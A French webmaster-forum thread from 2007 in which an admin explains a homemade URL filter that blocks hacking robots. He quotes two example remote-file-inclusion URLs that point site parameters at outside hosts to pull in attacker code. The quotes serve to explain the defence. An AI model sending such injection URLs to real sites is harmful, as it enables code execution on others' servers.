Message hyper bizarre sur le Hub

[Djames-Allen]

Bonjour le hub ,

à l'instant j'ai du essayer par deux fois pour me connecter au forum du Hub car un message bizarre d'OVH m'interdisait l'accès .

Il me disait en anglais " your visit have been detected as hacking " bon je n'ai pas tout retenu mais comme quoi leur script crawl aurait detecter que j'étais un hacker .

C'est quoi ce problème surtout que comme vous le savez je suis un visiteur assidut et respectueux de ce cette superbe communauté qui m'a tant appris .

[Arlette]

Bonjour,

Ben oui de temps en temps on essaie de flinguer un membre Aujourd'hui c'est tombé sur toi. Pas de bol !

Non, sérieusement, effectivement bizarre Tu n'aurais pas tapé ton mot de passe en majuscule par hasard ? Mais enfin, je vois pas pourquoi dans ce cas on t'aurait soupçonné de hacker !

Bon, j'avertis le chef...

[Dan]

C'est possible, vu que je viens d'installer un logiciel permettant de bloquer les hackers

On a effectivement quelques milliers de tentatives par jour... et si au moins ils cliquaient sur les adsenses ce serait mieux

Peux-tu m'envoyer l'URL précise que tu as utilisée ? (par MP) Car un des paramètres a dû être mal interprété.

Dan

PS: et pour info, ce n'est pas un script d'OVH

[Djames-Allen]

salut Arlette

alors aujourd'hui c'est ma fête, je devrais allez gratter un pti ticket on sait jamais .

J'ai préféré vous prévenir à moins que ce soit une mauvaises manip de ma part .J'ai peut être tapé mon pseudo en majuscule mais auparavant quand je me plantais je restais sur la même page de connexion et je voyais un message le pseudo n'existe pas .

La on m'affichait une grande page blanche avec deux lignes de texte écrit en bleu .

Bizarre quand même.

Surtout que pour hacker un site il faut être quand même assez fort en programmation pour le faire ce n'est pas à la porter de tout le monde.

Au faites j'ai du rafraichir la page pour pouvoir me connecter tranquillement.

Cordialement Djames

[doubleje]

On a effectivement quelques milliers de tentatives par jour...

Qu'est-ce qu'il rend le HUB vachement séduisant vis-à-vis des pirateurs informatiques ? Le site n'a jamais connu un acte réussit

Barvo les administrateurs

[Djames-Allen]

Bonjour Dan

Je te souhaite beaucoup de courage Dan pour lutter contre ces hackers .

Un millier c'est énorme , mais cela prouve la réussite du HUb

[Pat AfterMoon]

On a effectivement quelques milliers de tentatives par jour...

Un millier de hits ou un millier d'IP différentes ?

Je pose cette question parce que sur mon site, dans le log des erreurs 404, je vois de temps en temps des petits malins qui ont utilisé un logiciel de recherche de faille pour site web. Je me demande même si ce n'est pas les créateurs du logiciel en question qui font cela pour se faire de la pub, parce que dans le log, l'adresse du site vendant le logiciel est très visible.

A chaque fois cela fais des tonnes de hits sur des urls du style "./admin/login.php?truc-bidule". Dans les urls, on reconnait plein de logiciels connus de forum, des CMS, des scripts de galeries photo ...etc. Cela doit marcher de temps en temps chez ceux qui n'appliquent pas régulièrement les patchs de sécurité.

[yankey]

je viens d'installer un logiciel permettant de bloquer les hackers

et c'est quoi, Dan, ce logiciel ?

Modifié 19 Décembre 2007 par yankey

[Dan]

C'est "homemade" et cela analyse les URLs en entrée.

La grosse majorité des robots utilisés par les hackers génèrent des URLs de ce type

http://www.webmaster-hub.com/xxxxx.php?page=http://xxxxx.com/home/modules/mod_swmenupro/images/tree_icons/test.txt???

ou encore, beaucoup plus souvent

http://www.webmaster-hub.com/xxxxx.php?mosConfig_absolute_path=http://xxxx.chat.ru/_html/image?

Ce sont des tentatives d'injection de code qu'il vaut mieux bloquer !

[yankey]

I see. Bon courage

[doubleje]

Je pense que parmi ces enquêtes, il y a une grande partie venant des spammeurs qui cherchent à bombarder le forum avec leurs liens de XXX ou médicalement .... à l'aide de leurs robots.

Sinon les tentatives de piratage par l'injection SQL, XSS ou include comme le dit DAN sur forums IPB sont plus typiques et il n'y a pas beaucoup de failles d'ailleurs. Bref plus que certains codes évidemment.

[adn]

Dan,

J'ai eu le même problème à l'instant en me connectant à sqwebmail sur un de mes domaines. J'ai du m'y reprendre à deux fois. Regardes-tu ce point ?

[adn]

Je viens d'avoir çà sur le hub, est-ce le même sujet ?

IWSS Security Event (CORP-SUR-IWS03)

InterScan Web Security detected the following in HTTP trafic:

Item: http://www.webmaster-hub.com/index.php?act...253798&st=0

Action: deleted

Reason: Violation of a compressed file restriction

-- File: http://www.webmaster-hub.com/index.ph, security warning: Corrupted_Zip_file

The uncleanable file is deleted.

Finalement çà doit être propre à mon réseau....

[Dan]

Ca doit être propre à ton réseau, parce que je ne fais pas du tout appel à InterScan Web Security

Et de toutes manières, je ne mettrais pas cela en place sur des serveurs qui ne m'appartiennent pas... donc pour ton sqwebmail, c'est autre chose.

De plus, la dernière URL de ton post n'a pas une terminaison en .php mais en .ph

[yankey]

Juste merci pour les codes des urls exemple, ça m'a donné l'idée de vérifier deux trois trucs sur mes fichiers, et y a bien quelques détails qui m'avaient échappés

Modifié 20 Décembre 2007 par yankey